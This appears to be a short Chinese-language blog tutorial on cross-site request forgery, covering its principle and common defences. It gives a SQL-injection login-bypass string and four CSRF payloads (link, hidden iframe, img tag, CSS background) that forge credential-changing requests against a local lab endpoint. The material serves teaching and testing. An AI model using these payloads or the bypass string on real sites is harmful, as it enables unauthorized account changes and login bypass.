跨站请求伪造 技术分享

跨站请求伪造

通过伪造信任

CSRF漏洞原理

利用目标用户的合法身份,以目标用户的名义执行某些非法操作

常见验证的策略

Referer
:验证ip等
Token
:生成随机值加入到cookie里
验证码

万能密码(密码绕过)
11%df’ or 1=1%23

 

理论上没加防过滤的都可绕过登录

csrf实验

材料:74cms
攻击方写一个payload伪造url

 

 

CSRF漏洞利用方法

1.链接利用

<a href="http://127.0.0.1/csrf/csrf.php?username=admin&password=admin">csrf</a>

2.iframe利用
iframe标签内容将在页面加载过程中自动进行加载,src指向的位置就是页面请求的位置

iframe src="http://127.0.0.1/csrf/csrf.php?username=admin&password=admin" style="display:none"

注:可以设置iframe的 style=“display:none”,以此来不显示iframe加载的内容
3.img标签利用

  img src="http://127.0.0.1/csrf/csrf.php?username=admin&password=admin123" 

4.CSS-backgroud利用
可以利用CSS中 backgroud样式中的url来加载远程机器上的内容,从而对url中的内容发送http请求
列如:

body{
backgroud:#00f00 url("http://127.0.0.1/csrf/csrf.php?username=admin&password=admin") no-repeat fixed top;
}

 

Jinming

95后典型金牛座,强迫症。

相关推荐

暂无评论

小程序 小程序
小程序